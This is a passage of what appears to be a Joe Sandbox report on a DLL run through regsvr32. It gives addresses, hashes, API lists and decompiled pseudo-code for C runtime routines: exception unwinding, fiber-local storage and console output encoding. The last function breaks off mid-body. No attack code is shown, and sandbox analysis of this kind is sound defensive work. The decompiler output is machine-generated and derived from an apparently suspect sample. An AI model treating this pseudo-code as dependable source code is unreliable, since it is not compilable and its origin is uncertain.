                                                                                            0x180003bfa
                                                                                            0x180003c04
                                                                                            0x180003c08
                                                                                            0x180003c14
                                                                                            0x180003c1c
                                                                                            0x180003c25
                                                                                            0x180003c2b
                                                                                            0x180003c37
                                                                                            0x180003c3c
                                                                                            0x180003c43
                                                                                            0x180003c45
                                                                                            0x180003c4d
                                                                                            0x180003c57
                                                                                            0x180003c61
                                                                                            0x180003c6c
                                                                                            0x180003c71
                                                                                            0x180003c7a
                                                                                            0x180003c88
                                                                                            0x180003c8a
                                                                                            0x180003c8e
                                                                                            0x180003c90
                                                                                            0x180003c9c
                                                                                            0x180003caa
                                                                                            0x180003cb8
                                                                                            0x180003cc4
                                                                                            0x180003cca
                                                                                            0x180003cd3
                                                                                            0x180003cd5
                                                                                            0x180003cdd
                                                                                            0x180003cdf
                                                                                            0x180003cf2
                                                                                            0x180003d09
                                                                                            0x180003d18
                                                                                            0x180003d20
                                                                                            0x180003d27
                                                                                            0x180003d2c
                                                                                            0x180003d32
                                                                                            0x180003d3f
                                                                                            0x180003d51
                                                                                            0x180003d5f
                                                                                            0x180003d63
                                                                                            0x180003d68
                                                                                            0x180003d8c

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 851805269-3733052814
                                                                                            • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                            • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                            • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                            • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180002A84 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 30%
                                                                                            			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00000001180004584(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0x80002b9e;
				if (_t178 - _t130 >= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0x80002ba5;
				if (_t113 <= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
				if ( *0x800164f8 == 0) goto 0x80002b5b;
				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
				_t83 =  *0x800164f8();
				r8d = 1;
				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00000001180004580(_t84);
				goto 0x80002ada;
				goto 0x80002c5d;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0x80002c4e;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0x80002c4c;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0x80002c4c;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0x80002c21;
				r9d = 0;
				if (_t101 == 0) goto 0x80002c1c;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0x80002c14;
				if (_t156 - _t133 >= 0) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0x80002be4;
				if (r9d != _t101) goto 0x80002c58;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
				if (_t156 != _t133) goto 0x80002c4c;
				if (r10d != 0) goto 0x80002c58;
				goto 0x80002c4c;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
				return 1;
			}






























                                                                                            0x180002a84
                                                                                            0x180002a84
                                                                                            0x180002a89
                                                                                            0x180002a8e
                                                                                            0x180002a9c
                                                                                            0x180002aa0
                                                                                            0x180002aa3
                                                                                            0x180002aac
                                                                                            0x180002aaf
                                                                                            0x180002ab4
                                                                                            0x180002abb
                                                                                            0x180002abf
                                                                                            0x180002ac6
                                                                                            0x180002aca
                                                                                            0x180002ad0
                                                                                            0x180002ad5
                                                                                            0x180002adc
                                                                                            0x180002ae4
                                                                                            0x180002aee
                                                                                            0x180002afb
                                                                                            0x180002b06
                                                                                            0x180002b11
                                                                                            0x180002b24
                                                                                            0x180002b26
                                                                                            0x180002b28
                                                                                            0x180002b31
                                                                                            0x180002b3b
                                                                                            0x180002b4b
                                                                                            0x180002b55
                                                                                            0x180002b5f
                                                                                            0x180002b6b
                                                                                            0x180002b77
                                                                                            0x180002b7e
                                                                                            0x180002b85
                                                                                            0x180002b8a
                                                                                            0x180002b8e
                                                                                            0x180002b93
                                                                                            0x180002b99
                                                                                            0x180002ba0
                                                                                            0x180002ba7
                                                                                            0x180002bb0
                                                                                            0x180002bb3
                                                                                            0x180002bba
                                                                                            0x180002bc4
                                                                                            0x180002bce
                                                                                            0x180002bd1
                                                                                            0x180002bd3
                                                                                            0x180002bd7
                                                                                            0x180002bdb
                                                                                            0x180002bdd
                                                                                            0x180002be2
                                                                                            0x180002be4
                                                                                            0x180002be7
                                                                                            0x180002bf2
                                                                                            0x180002bfc
                                                                                            0x180002c07
                                                                                            0x180002c12
                                                                                            0x180002c14
                                                                                            0x180002c1a
                                                                                            0x180002c1f
                                                                                            0x180002c27
                                                                                            0x180002c2c
                                                                                            0x180002c31
                                                                                            0x180002c33
                                                                                            0x180002c3b
                                                                                            0x180002c3f
                                                                                            0x180002c49
                                                                                            0x180002c52
                                                                                            0x180002c7a

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                            • String ID: csm$f
                                                                                            • API String ID: 2395640692-629598281
                                                                                            • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                            • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                            • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                            • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180006108 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                            • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                            • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                            • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00000001800077FC Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 85%
                                                                                            			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
				if (sil >= 0) goto 0x8000782e;
				E0000000118000BC4C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x80007885;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x80007849;
				asm("dec eax");
				if (_t42 >= 0) goto 0x80007849;
				E0000000118000BC4C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x80007885;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x80007865;
				asm("dec eax");
				if (_t43 >= 0) goto 0x80007865;
				E0000000118000BC4C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x80007885;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x80007885;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80007885;
				if ((dil & 0x00000010) == 0) goto 0x80007882;
				E0000000118000BC4C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x8000789f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x8000789f;
				E0000000118000BC4C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                                                                            0x1800077fc
                                                                                            0x180007801
                                                                                            0x180007810
                                                                                            0x180007818
                                                                                            0x18000781d
                                                                                            0x180007824
                                                                                            0x180007829
                                                                                            0x18000782c
                                                                                            0x180007833
                                                                                            0x180007836
                                                                                            0x180007838
                                                                                            0x18000783d
                                                                                            0x18000783f
                                                                                            0x180007844
                                                                                            0x180007847
                                                                                            0x180007849
                                                                                            0x18000784d
                                                                                            0x18000784f
                                                                                            0x180007854
                                                                                            0x18000785b
                                                                                            0x180007860
                                                                                            0x180007863
                                                                                            0x180007865
                                                                                            0x180007869
                                                                                            0x18000786b
                                                                                            0x180007870
                                                                                            0x180007876
                                                                                            0x18000787d
                                                                                            0x180007882
                                                                                            0x180007885
                                                                                            0x180007889
                                                                                            0x18000788b
                                                                                            0x180007890
                                                                                            0x180007897
                                                                                            0x1800078b5

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: _set_statfp
                                                                                            • String ID:
                                                                                            • API String ID: 1156100317-0
                                                                                            • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                            • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                            • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                            • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180007FF8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID:
                                                                                            • API String ID: 3702945584-0
                                                                                            • Opcode ID: bd0d3b981fc10e7cfe1f2c0abaf01122f4bff4453aed3835adc87ef51088108d
                                                                                            • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                            • Opcode Fuzzy Hash: bd0d3b981fc10e7cfe1f2c0abaf01122f4bff4453aed3835adc87ef51088108d
                                                                                            • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180007E8C Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID:
                                                                                            • API String ID: 3702945584-0
                                                                                            • Opcode ID: bd7431c49e4a679ad0fc349417f75538c94fde3ead8382cecdd8aabc73299240
                                                                                            • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                            • Opcode Fuzzy Hash: bd7431c49e4a679ad0fc349417f75538c94fde3ead8382cecdd8aabc73299240
                                                                                            • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180003800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 68%
                                                                                            			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x800038a4;
				E00000001180002D40(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00000001180002D40(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x800038c3;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x800038c3;
				return _t19;
			}















                                                                                            0x180003800
                                                                                            0x180003803
                                                                                            0x180003807
                                                                                            0x18000380b
                                                                                            0x18000381a
                                                                                            0x18000381e
                                                                                            0x180003834
                                                                                            0x180003836
                                                                                            0x18000383b
                                                                                            0x180003848
                                                                                            0x18000384c
                                                                                            0x180003855
                                                                                            0x18000385e
                                                                                            0x180003867
                                                                                            0x180003870
                                                                                            0x180003874
                                                                                            0x180003884
                                                                                            0x18000388c
                                                                                            0x180003891
                                                                                            0x180003896
                                                                                            0x18000389b
                                                                                            0x1800038a2
                                                                                            0x1800038be

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallEncodePointerTranslator
                                                                                            • String ID: MOC$RCC
                                                                                            • API String ID: 3544855599-2084237596
                                                                                            • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                            • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                            • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                            • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000000018000D5B8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 32%
                                                                                            			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t183;
				signed int _t187;
				signed int _t194;
				signed int _t199;
				intOrPtr _t208;
				void* _t210;
				signed char _t211;
				void* _t261;
				signed long long _t262;
				long long _t267;
				long long _t269;
				void* _t270;
				long long _t272;
				intOrPtr* _t278;
				intOrPtr* _t285;
				long long _t287;
				long long _t313;
				void* _t321;
				long long _t322;
				void* _t323;
				long long _t324;
				long long _t326;
				signed char* _t327;
				signed char* _t328;
				signed char* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				signed long long _t333;
				intOrPtr _t336;
				intOrPtr _t339;
				void* _t341;
				signed long long _t343;
				signed long long _t345;
				long long _t354;
				void* _t358;
				long long _t359;
				signed long long _t362;
				char _t363;
				signed long long _t364;
				void* _t367;
				signed char* _t368;
				signed long long _t370;

				_t261 = _t332;
				_t331 = _t261 - 0x57;
				_t333 = _t332 - 0xd0;
				 *((long long*)(_t331 - 9)) = 0xfffffffe;
				 *((long long*)(_t261 + 8)) = __rbx;
				_t262 =  *0x80021010; // 0x5e1a320b5ccd
				 *(_t331 + 0x17) = _t262 ^ _t333;
				 *((long long*)(_t331 - 0x41)) = __r8;
				_t278 = __rcx;
				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
				_t362 = __edx >> 6;
				 *(_t331 - 0x39) = _t362;
				_t370 = __edx + __edx * 8;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
				 *((long long*)(_t331 - 0x19)) = _t267;
				r12d = r9d;
				_t359 = _t358 + __r8;
				 *((long long*)(_t331 - 0x61)) = _t359;
				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
				0x80006f60();
				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
				 *((long long*)(__rcx)) = _t267;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
				_t343 = __edx >> 6;
				 *(_t331 - 0x11) = _t343;
				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
				r12d = 1;
				if (_t208 != 0xfde9) goto 0x8000d81d;
				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
				if ( *_t285 == dil) goto 0x8000d6ca;
				_t367 = _t324 + 1;
				if (_t367 - 5 < 0) goto 0x8000d6b7;
				if (_t367 <= 0) goto 0x8000d7b3;
				r12d =  *((char*)(_t285 + 0x1800218d1));
				r12d = r12d + 1;
				_t183 = r12d - 1;
				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
				_t336 = _t183;
				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
				_t287 = _t324;
				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
				if (_t336 <= 0) goto 0x8000d74b;
				0x80004b30();
				_t354 =  *((intOrPtr*)(_t331 - 0x59));
				_t313 = _t324;
				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
				 *((long long*)(_t331 - 0x31)) = _t324;
				_t269 = _t331 - 1;
				 *((long long*)(_t331 - 0x29)) = _t269;
				_t187 = (0 | r12d == 0x00000004) + 1;
				r12d = _t187;
				r8d = _t187;
				 *((long long*)(_t333 + 0x20)) = _t354;
				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
				if (_t269 == 0xffffffff) goto 0x8000da03;
				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
				goto 0x8000d8ae;
				_t363 =  *((char*)(_t269 + 0x1800218d0));
				_t210 = _t363 + 1;
				_t270 = _t210;
				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
				 *((long long*)(_t331 - 0x51)) = _t324;
				 *((long long*)(_t331 - 0x21)) = _t326;
				_t194 = (0 | _t210 == 0x00000004) + 1;
				r14d = _t194;
				r8d = _t194;
				 *((long long*)(_t333 + 0x20)) = _t354;
				_t345 = _t331 - 0x51;
				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
				if (_t270 == 0xffffffff) goto 0x8000da03;
				_t327 = _t326 + _t363;
				r12d = r14d;
				_t364 =  *(_t331 - 0x39);
				goto 0x8000d8ae;
				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
				_t211 =  *(_t339 + 0x3d + _t370 * 8);
				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
				 *((char*)(_t331 + 8)) =  *_t327;
